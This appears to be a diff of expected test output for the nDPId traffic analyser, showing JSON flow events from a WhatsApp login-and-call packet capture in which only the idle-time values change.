+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"IMAPS.Apple","breed":"Safe","category":"Web"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"IMAPS.Apple","breed":"Safe","category":"Web"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 